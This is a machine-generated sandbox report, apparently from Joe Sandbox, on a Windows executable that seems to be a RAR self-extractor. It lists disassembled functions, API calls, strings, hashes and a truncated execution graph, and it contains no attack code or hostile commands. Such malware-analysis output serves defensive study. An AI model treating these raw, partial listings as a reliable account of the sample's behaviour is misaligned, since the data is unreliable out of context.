                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: f57db7b703e829cb1125878d51fa55c0d65b42f7cafea2aa3758269b9bfcef34
                                                              • Instruction ID: a05067562ae7ab85dc2140a6d85ef3ba64ae77baf73bb90df336514879944f38
                                                              • Opcode Fuzzy Hash: f57db7b703e829cb1125878d51fa55c0d65b42f7cafea2aa3758269b9bfcef34
                                                              • Instruction Fuzzy Hash: C6E0EC3596EFA0EBD6212BB0BD8DB867A54AB1ABA3F010141F601AE190C6A04C019B92
                                                              Function 009A7C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 009A8294
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 009B087E: __EH_prolog3_GS.LIBCMT ref: 009B0885
                                                                • Part of subcall function 009B087E: GetLastError.KERNEL32(0000001C,009A8244,?,00000000,00000086,?,1AC349C0,?,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B089D
                                                                • Part of subcall function 009B087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B08D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                              • String ID: %ls
                                                              • API String ID: 1279724102-3246610740
                                                              • Opcode ID: 8c19093897fb2589047ea2414ccfc8378aef05538c48ee78f04523876249d8ea
                                                              • Instruction ID: 2a118035ab4ad1f03d2fc285e1cccf9ecd3aabda2da64a047ae79358796cb2a9
                                                              • Opcode Fuzzy Hash: 8c19093897fb2589047ea2414ccfc8378aef05538c48ee78f04523876249d8ea
                                                              • Instruction Fuzzy Hash: 0AB1BF7080420AEEDF30EF94CE86FEEBBB5BF56354F104819F852661E1DBB55A14DA80
                                                              Function 009AEF21 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009AEBAA: GetDC.USER32(00000000), ref: 009AEBAE
                                                                • Part of subcall function 009AEBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009AEBB9
                                                                • Part of subcall function 009AEBAA: ReleaseDC.USER32(00000000,00000000), ref: 009AEBC4
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 009AEF65
                                                                • Part of subcall function 009AF1EC: GetDC.USER32(00000000), ref: 009AF1F5
                                                                • Part of subcall function 009AF1EC: GetObjectW.GDI32(?,00000018,?), ref: 009AF224
                                                                • Part of subcall function 009AF1EC: ReleaseDC.USER32(00000000,?), ref: 009AF2BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              • Opcode ID: 9078e03f1989d636b9310c25ced49de0aac1806230771a48cc6f06dde5f1f037
                                                              • Instruction ID: aa3a6992dc8403dd95965281f0a7068695ac2647e5a970db2076f59942efd018
                                                              • Opcode Fuzzy Hash: 9078e03f1989d636b9310c25ced49de0aac1806230771a48cc6f06dde5f1f037
                                                              • Instruction Fuzzy Hash: FB91F0B16183549FC650DF65C844E2BBBE9FF89B04F00491EF48AE7260CB30E905CBA2
                                                              Function 009C1E68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 009C1FD4
                                                                • Part of subcall function 009BACBB: IsProcessorFeaturePresent.KERNEL32(00000017,009BAC8D,009B535E,?,?,00000000,009B535E,00000016,?,?,009BAC9A,00000000,00000000,00000000,00000000,00000000), ref: 009BACBD
                                                                • Part of subcall function 009BACBB: GetCurrentProcess.KERNEL32(C0000417,?,009B535E), ref: 009BACDF
                                                                • Part of subcall function 009BACBB: TerminateProcess.KERNEL32(00000000,?,009B535E), ref: 009BACE6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                              • Instruction ID: a8576f2c78364d05d56100ab2a813ac349e8fdf3f6e60fe0751c931ea77489c6
                                                              • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                              • Instruction Fuzzy Hash: 09517F75E0020A9FDF14DFA8C881BADBBB9EF89310F24416DE854E7342E7359A018B55
                                                              Function 0099F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A79F7: GetSystemTime.KERNEL32(?,00000000), ref: 009A7A0F
                                                                • Part of subcall function 009A79F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 009A7A1D
                                                                • Part of subcall function 009A79A0: __aulldiv.LIBCMT ref: 009A79A9
                                                              • __aulldiv.LIBCMT ref: 0099F162
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,1AC349C0,?,?,00000000,?,00000000,009C9F3D,000000FF), ref: 0099F169
                                                                • Part of subcall function 00991150: _wcslen.LIBCMT ref: 0099115B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                              • String ID: .rartemp
                                                              • API String ID: 3789791499-2558811017
                                                              • Opcode ID: 897eeacfe87f6ac65741021d6f08db8a2039988c9ca1b92c9eabdbd28bcada40
                                                              • Instruction ID: 518bd188cec325a17e4109938319d70edde1eccc04a57fbb6ec08bf94208003c
                                                              • Opcode Fuzzy Hash: 897eeacfe87f6ac65741021d6f08db8a2039988c9ca1b92c9eabdbd28bcada40
                                                              • Instruction Fuzzy Hash: 08416F71901249AFDF14EFA8CC46FEEBBA9FF94350F404129F91593281EB349B49CA60
                                                              Function 009ADACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009ADAD5
                                                                • Part of subcall function 009A0360: __EH_prolog3.LIBCMT ref: 009A0367
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Shell.Explorer$about:blank
                                                              • API String ID: 431132790-874089819
                                                              • Opcode ID: 2024bc3fdc47d477dc6803d06d7cade402edd0c342faeab55fedeb570bf0b59c
                                                              • Instruction ID: 866707039aa9644c79296f6b5f3bf4272e140175d249dec40458b29226b4b1a1
                                                              • Opcode Fuzzy Hash: 2024bc3fdc47d477dc6803d06d7cade402edd0c342faeab55fedeb570bf0b59c
                                                              • Instruction Fuzzy Hash: E5416D70B012019FDB08DF64C895B6A77B5BF8A700F15846DE947AF6A1DB70AD00CBA1
                                                              Function 009B0110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009B017B
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 009B01B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              • Opcode ID: 7dc0c1ca0a48b5762f6a954b3952bfed82590ed7db0e4a352f3f0d9b8891aad7
                                                              • Instruction ID: 435b51f7bd06d6ba610736968e183005dbde92b8970d1a7e9b65d7f230133360
                                                              • Opcode Fuzzy Hash: 7dc0c1ca0a48b5762f6a954b3952bfed82590ed7db0e4a352f3f0d9b8891aad7
                                                              • Instruction Fuzzy Hash: 821108B264C3447BD2349A289D89FFB77ACEBC6720F000829F745A7180C734AD4186B6
                                                              Function 009A5109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A5094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009A50B3
                                                                • Part of subcall function 009A5094: GetProcAddress.KERNEL32(009E51F8,CryptUnprotectMemory), ref: 009A50C3
                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,009A5104), ref: 009A5197
                                                              Strings
                                                              • CryptUnprotectMemory failed, xrefs: 009A518F
                                                              • CryptProtectMemory failed, xrefs: 009A514E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: ae9fa5e11a8f4c785e5aa4d7cc400bea4287c3c6c4ec48ed8b85186c05138406
                                                              • Instruction ID: a1207f353f5d61854cde620df095955b3fa5bcac6b1507b598b30395c2ca4967
                                                              • Opcode Fuzzy Hash: ae9fa5e11a8f4c785e5aa4d7cc400bea4287c3c6c4ec48ed8b85186c05138406
                                                              • Instruction Fuzzy Hash: 2F112671B09A24ABDF119F24DC44B7E3B69BF42764B024019FC256F291D630ED01CAD4
                                                              Function 009B4264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(000103EA), ref: 009B4291
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,000103EA,009B0110,?), ref: 009B42BA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 3157717868-3292211884
                                                              • Opcode ID: 9dc1d02e8e8bac23fe8b490f05b2faa05b693fb6f1569b784d3add2f65c723a1
                                                              • Instruction ID: 13c7fd4e9c90c1d2cd9441458685a849e37b89bf464a1796c004cedcfd7d79aa
                                                              • Opcode Fuzzy Hash: 9dc1d02e8e8bac23fe8b490f05b2faa05b693fb6f1569b784d3add2f65c723a1
                                                              • Instruction Fuzzy Hash: 9A01213029D795FFCB11AB64DD56FE737CC5B82329B054119F81197152C6B09C40FB61
                                                              Function 00991E44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A3EAA: _swprintf.LIBCMT ref: 009A3EEA
                                                                • Part of subcall function 009A3EAA: _strlen.LIBCMT ref: 009A3F0B
                                                                • Part of subcall function 009A3EAA: SetDlgItemTextW.USER32(?,009D919C,?), ref: 009A3F64
                                                                • Part of subcall function 009A3EAA: GetWindowRect.USER32(?,?), ref: 009A3F9A
                                                                • Part of subcall function 009A3EAA: GetClientRect.USER32(?,?), ref: 009A3FA6
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                              • SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              • Opcode ID: d72bf4e0adf8a14944c732578e001e16f45a5b9b190a0279e119e360323fac85
                                                              • Instruction ID: 2e675b4d537cab162d4b8dd508a122756b549fe505198d243af2962a1c7a7339
                                                              • Opcode Fuzzy Hash: d72bf4e0adf8a14944c732578e001e16f45a5b9b190a0279e119e360323fac85
                                                              • Instruction Fuzzy Hash: 18F0A430A8834DA7DF161FE5DD0ABEA3B9CBF05305F088155FC45582A1C774C990EB50
                                                              Function 009A75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,009A770A,?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75F3
                                                              • GetLastError.KERNEL32(?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75FF
                                                                • Part of subcall function 009992EB: __EH_prolog3_GS.LIBCMT ref: 009992F2
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009A7608
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 2419225763-2248577382
                                                              • Opcode ID: b09bc52509228d2c387ebef2edd96368e4dd46920b0a552b6762354a157d11a5
                                                              • Instruction ID: dc4db803cbc3517e7ea5c9bac5b0947183581d184dd3129887e1fe6f2cba4ff2
                                                              • Opcode Fuzzy Hash: b09bc52509228d2c387ebef2edd96368e4dd46920b0a552b6762354a157d11a5
                                                              • Instruction Fuzzy Hash: 33D05E71D4D521B7DD2073AC9C0AEAE7D099FA2330F600728F638653E5DA20084192EE
                                                              Function 009A3E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,1AC349C0), ref: 009A3E65
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 009A3E73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: fb777bb5e6c9b2da1305e2047fda6addd82dff75395a4889fd47dca0f9692ddb
                                                              • Instruction ID: 8b6d4a5ba8f139f06a6c8d209a7fb2c8fb14a4faac6e24dcd8b7cd3ef5c1bf7b
                                                              • Opcode Fuzzy Hash: fb777bb5e6c9b2da1305e2047fda6addd82dff75395a4889fd47dca0f9692ddb
                                                              • Instruction Fuzzy Hash: F7C012B1E5431096EB3057717C0DF432D585B05715F05045CF50D994C0D5E5D8418BD0

                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:51
                                                              execution_graph 98160 c51044 98165 c52735 98160->98165 98162 c5104a 98201 c70433 29 API calls __onexit 98162->98201 98164 c51054 98202 c529da 98165->98202 98169 c527ac 98212 c5bf07 98169->98212 98172 c5bf07 8 API calls 98173 c527c0 98172->98173 98174 c5bf07 8 API calls 98173->98174 98175 c527ca 98174->98175 98176 c5bf07 8 API calls 98175->98176 98177 c52808 98176->98177 98178 c5bf07 8 API calls 98177->98178 98179 c528d4 98178->98179 98217 c52d5e 98179->98217 98183 c52906 98184 c5bf07 8 API calls 98183->98184 98185 c52910 98184->98185 98238 c630e0 98185->98238 98187 c5293b 98248 c530ed 98187->98248 98189 c52957 98190 c52967 GetStdHandle 98189->98190 98191 c939c1 98190->98191 98192 c529bc 98190->98192 98191->98192 98193 c939ca 98191->98193 98195 c529c9 OleInitialize 98192->98195 98255 c7016b 98193->98255 98195->98162 98196 c939d1 98264 cc09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98196->98264 98198 c939da 98201->98164 98266 c52a33 98202->98266 98205 c52a33 8 API calls 98206 c52a12 98205->98206 98207 c5bf07 8 API calls 98206->98207 98208 c52a1e 98207->98208 98273 c584b7 98208->98273 98210 c5276b 98211 c53205 6 API calls 98210->98211 98211->98169 98213 c7019b 8 API calls 98212->98213 98214 c5bf1c 98213->98214 98215 c7016b 8 API calls 98214->98215 98216 c527b6 98215->98216 98216->98172 98218 c5bf07 8 API calls 98217->98218 98219 c52d6e 98218->98219 98220 c5bf07 8 API calls 98219->98220 98221 c52d76 98220->98221 98222 c5bf07 8 API calls 98221->98222 98223 c52d91 98222->98223 98224 c7016b 8 API calls 98223->98224 98225 c528de 98224->98225 98226 c5318c 98225->98226 98227 c5319a 98226->98227 98228 c5bf07 8 API calls 98227->98228 98229 c531a5 98228->98229 98230 c5bf07 8 API calls 98229->98230 98231 c531b0 98230->98231 98232 c5bf07 8 API calls 98231->98232 98233 c531bb 98232->98233 98234 c5bf07 8 API calls 98233->98234 98235 c531c6 98234->98235 98236 c7016b 8 API calls 98235->98236 98237 c531d8 RegisterWindowMessageW 98236->98237 98237->98183 98239 c63121 98238->98239 98242 c630fd 98238->98242 98308 c705d2 5 API calls __Init_thread_wait 98239->98308 98247 c6310e 98242->98247 98310 c705d2 5 API calls __Init_thread_wait 98242->98310 98243 c6312b 98243->98242 98309 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98243->98309 98244 c69ec7 98244->98247 98311 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98244->98311 98247->98187 98249 c93c69 98248->98249 98250 c530fd 98248->98250 98312 cc3b63 8 API calls 98249->98312 98252 c7016b 8 API calls 98250->98252 98253 c53105 98252->98253 98253->98189 98254 c93c74 98256 c70170 ___std_exception_copy 98255->98256 98257 c7018a 98256->98257 98260 c7018c 98256->98260 98313 c7523d 7 API calls 2 library calls 98256->98313 98257->98196 98259 c709fd 98315 c73634 RaiseException 98259->98315 98260->98259 98314 c73634 RaiseException 98260->98314 98262 c70a1a 98262->98196 98264->98198 98267 c5bf07 8 API calls 98266->98267 98268 c52a3e 98267->98268 98269 c5bf07 8 API calls 98268->98269 98270 c52a46 98269->98270 98271 c5bf07 8 API calls 98270->98271 98272 c52a08 98271->98272 98272->98205 98274 c965bb 98273->98274 98275 c584c7 _wcslen 98273->98275 98295 c596d9 98274->98295 98278 c58502 98275->98278 98279 c584dd 98275->98279 98277 c965c4 98277->98277 98281 c7016b 8 API calls 98278->98281 98285 c58894 8 API calls 98279->98285 98282 c5850e 98281->98282 98286 c7019b 98282->98286 98284 c584e5 __fread_nolock 98284->98210 98285->98284 98287 c7016b ___std_exception_copy 98286->98287 98288 c7018a 98287->98288 98291 c7018c 98287->98291 98299 c7523d 7 API calls 2 library calls 98287->98299 98288->98284 98290 c709fd 98301 c73634 RaiseException 98290->98301 98291->98290 98300 c73634 RaiseException 98291->98300 98293 c70a1a 98293->98284 98296 c596e7 98295->98296 98298 c596f0 __fread_nolock 98295->98298 98296->98298 98302 c5c269 98296->98302 98298->98277 98299->98287 98300->98290 98301->98293 98303 c5c27c 98302->98303 98304 c5c279 __fread_nolock 98302->98304 98305 c7016b 8 API calls 98303->98305 98304->98298 98306 c5c287 98305->98306 98307 c7019b 8 API calls 98306->98307 98307->98304 98308->98243 98309->98242 98310->98244 98311->98247 98312->98254 98313->98256 98314->98259 98315->98262 98317 ca1a68 98318 ca1a70 98317->98318 98321 c5d4e5 98317->98321 98363 cb79af 8 API calls __fread_nolock 98318->98363 98320 ca1a82 98364 cb7928 8 API calls __fread_nolock 98320->98364 98324 c7016b 8 API calls 98321->98324 98323 ca1aac 98365 c602f0 98323->98365 98326 c5d539 98324->98326 98347 c5c2cd 98326->98347 98327 ca1ad3 98328 ca1ae7 98327->98328 98388 cd60a2 53 API calls _wcslen 98327->98388 98332 c7016b 8 API calls 98335 c5d61e messages 98332->98335 98333 ca1b04 98333->98321 98389 cb79af 8 API calls __fread_nolock 98333->98389 98340 ca1f1c 98335->98340 98342 ca1f37 98335->98342 98343 c5be6d 8 API calls 98335->98343 98344 c5c34b 8 API calls 98335->98344 98345 c5d8c1 messages 98335->98345 98390 c5b3fe 98335->98390 98338 c5d95c messages 98346 c5d973 98338->98346 98362 c6e284 8 API calls messages 98338->98362 98394 cb55d9 8 API calls messages 98340->98394 98343->98335 98344->98335 98345->98338 98354 c5c34b 98345->98354 98351 c5c2dd 98347->98351 98348 c5c2e5 98348->98332 98349 c7016b 8 API calls 98349->98351 98350 c5bf07 8 API calls 98350->98351 98351->98348 98351->98349 98351->98350 98352 c5c2cd 8 API calls 98351->98352 98395 c5be6d 98351->98395 98352->98351 98355 c5c359 98354->98355 98361 c5c381 messages 98354->98361 98356 c5c367 98355->98356 98357 c5c34b 8 API calls 98355->98357 98358 c5c34b 8 API calls 98356->98358 98359 c5c36d 98356->98359 98357->98356 98358->98359 98359->98361 98399 c5c780 98359->98399 98361->98338 98362->98338 98363->98320 98364->98323 98383 c60326 messages 98365->98383 98366 c70433 29 API calls pre_c_initialization 98366->98383 98367 c7016b 8 API calls 98367->98383 98368 ca62cf 98409 cc3ef6 81 API calls __wsopen_s 98368->98409 98370 c61645 98374 c5be6d 8 API calls 98370->98374 98382 c6044d messages 98370->98382 98372 